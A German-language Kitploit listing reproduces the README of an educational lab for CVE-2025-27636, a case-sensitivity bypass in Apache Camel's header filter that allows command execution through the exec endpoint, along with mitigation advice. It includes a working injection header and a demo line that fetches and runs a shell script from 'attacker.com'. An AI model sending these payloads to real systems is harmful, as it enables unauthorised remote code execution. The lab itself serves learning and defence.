Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-27636-Practical-Lab — # Praktisches Labor zur Reproduktion von CVE-2025-27636, einer kritischen RCE in Apache Camel durch Umgehung des case-sensitiven Header-Filters. Demonstriert Header-Injection zur Ausführung beliebiger Befehle über den exec-Endpunkt. | Kitploit
Tools/GitHubGitHub/enochgitgamefied/cve-2025-27636-practical-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubenochgitgamefied/cve-2025-27636-practical-lab

CVE-2025-27636-Practical-Lab

# Praktisches Labor zur Reproduktion von CVE-2025-27636, einer kritischen RCE in Apache Camel durch Umgehung des case-sensitiven Header-Filters. Demonstriert Header-Injection zur Ausführung beliebiger Befehle über den exec-Endpunkt.

Repository anzeigen
2vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ CVE-2025-27636 — Praktisches Exploitation-Labor für Apache Camel

🔍 Übersicht

CVE-2025-27636 ist eine kritische Remote-Codeausführung (RCE)-Schwachstelle in Apache Camel, insbesondere in der Komponente camel-exec. Sie beruht auf einem subtilen, aber gefährlichen Problem:

Die DefaultHeaderFilterStrategy führt case-sensitive Prüfungen von Headernamen durch, die durch alternative Schreibweise umgangen werden können.

Das bedeutet, dass interne Camel-Header – wie CamelExecCommandExecutable –, die eigentlich blockiert werden sollten, durchschlüpfen können, wenn ihre Schreibweise manipuliert wird (z. B. cAmeLexecCommandExecutable).

Wenn dieser Header den exec:-Endpunkt erreicht, kann ein Angreifer beliebige Befehle einschleusen, was zur vollständigen Kompromittierung des Systems führt.


📌 Technischer Hintergrund

✅ DefaultHeaderFilterStrategy

Der DefaultHeaderFilterStrategy von Apache Camel soll interne Header schützen, wie:

  • CamelHttp*
  • CamelFile*
  • CamelExecCommandExecutable ← 🚨 anfällig, wenn die Schreibweise den Filter umgeht

🔍 Was bedeutet „Intern“? Interne Header sind:

  • Mit Camel* beginnend
  • Nur innerhalb von Camel zur Steuerung des Verhaltens (Routing, Verarbeitung, Endpunkte) verwendet
  • Nicht dafür gedacht, externen Systemen wie HTTP, JMS usw. ausgesetzt zu werden

Vor dem Patch hat dieser Filter Header-Namen case-sensitiv abgeglichen, was gegen die HTTP-Spezifikation verstößt (Header sind case-insensitiv) und Umgehungen wie die folgende ermöglicht:

root@kitploit:~
GET /systeminfo HTTP/1.1
Host: target-ip:8484
cAmeLexecCommandExecutable: /bin/bash -c "touch /tmp/pwned"

Dieser Header würde an die exec:-Komponente weitergereicht, die dann die Nutzlast ausführt.

🛠️ CamelExecCommandExecutable

Dieser Header teilt der camel-exec-Komponente mit, welcher Befehl ausgeführt werden soll. Er ist mächtig – und extrem gefährlich – wenn er vom Benutzer kontrolliert werden kann, insbesondere in Umgebungen, die Betriebssystembefehle unterstützen (z. B. bash, cmd.exe usw.).


🧪 Praxis-Labor: Pinewood Server Diagnostic

Projekt: Pinewood Server Diagnostic Autor: @enochgitgamefied Ziel: Reproduktion von CVE-2025-27636 in einem live, pädagogischen Labor.


🔗 GitHub-Repository

👉 https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab


📁 Projektübersicht

  • Erstellt mit Apache Camel 4.10.0
  • Routen:
    • /tasks → Listet Aufgaben mit exec:tasklist oder exec:ps
    • /systeminfo → Gibt OS-Informationen aus (systeminfo oder uname -a)
    • /network → Zeigt ipconfig oder ifconfig
  • Weboberfläche unter / mit eingebettetem Jetty
  • Anfällig für Header-Injection mit modifizierter Schreibweise, wenn der Filter nicht gepatcht ist

⚙️ Erste Schritte

root@kitploit:~
# Clone the repository
git clone https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab.git
cd CVE-2025-27636-Pratctical-Lab

# Package the app
mvn clean package

# Run it
java -jar target/hello-camel-1.0-SNAPSHOT.jar

Dann in Ihrem Browser aufrufen:

🖥️ http://<your-ip>:8484


🚨 Vorführen der Schwachstelle

Ungepatchtes Verhalten:

Wenn Sie einen Header wie diesen senden (beachten Sie die Schreibweise):

root@kitploit:~
cAmeLexecCommandExecutable: whoami

Der Filter blockiert ihn nicht und er wird an den exec:-Endpunkt weitergereicht. Sie können demonstrieren:

  • whoami
  • uname -a
  • bash -c "curl http://attacker.com/shell.sh | bash" ← gefährlich

🎥 YouTube-Demo

Eine vollständige Demonstration wird vorbereitet und bald hochgeladen. Sie wird Folgendes durchgehen:

  • Einrichtung der Anwendung
  • Header-Injection
  • Befehlsausführung
  • Behebungsschritte

Demo-Link auf YouTube https://www.youtube.com/watch?v=z4Xf9LYXc9o&t=714s!


🛡️ Minderung & Fix

  1. Apache Camel aktualisieren auf eine Version mit case-insensitivem Header-Filtering (dies ist gepatcht).
  2. Verwenden Sie eine benutzerdefinierte HeaderFilterStrategy, wenn Sie strengere Logik erzwingen müssen.
  3. Setzen Sie exec:-Routen nicht direkt HTTP aus, es sei denn, sie sind vollständig abgesichert.

🧠 Wichtige Erkenntnisse

  • Interne Header dürfen niemals von externen Benutzern kontrollierbar sein.
  • Case-Sensitivität in Sicherheitsfiltern ist ein bekanntes Anti-Pattern.
  • Apache Camel ist mächtig, aber mit dieser Macht kommt Verantwortung – insbesondere beim Verketten von HTTP mit exec.

⚠️ Haftungsausschluss

Dieses Labor ist ausschließlich für pädagogische und kontrollierte Laborzwecke bestimmt. Versuchen Sie dies niemals auf nicht autorisierten Systemen oder Netzwerken.

Apache Camel2
Tool herunterladen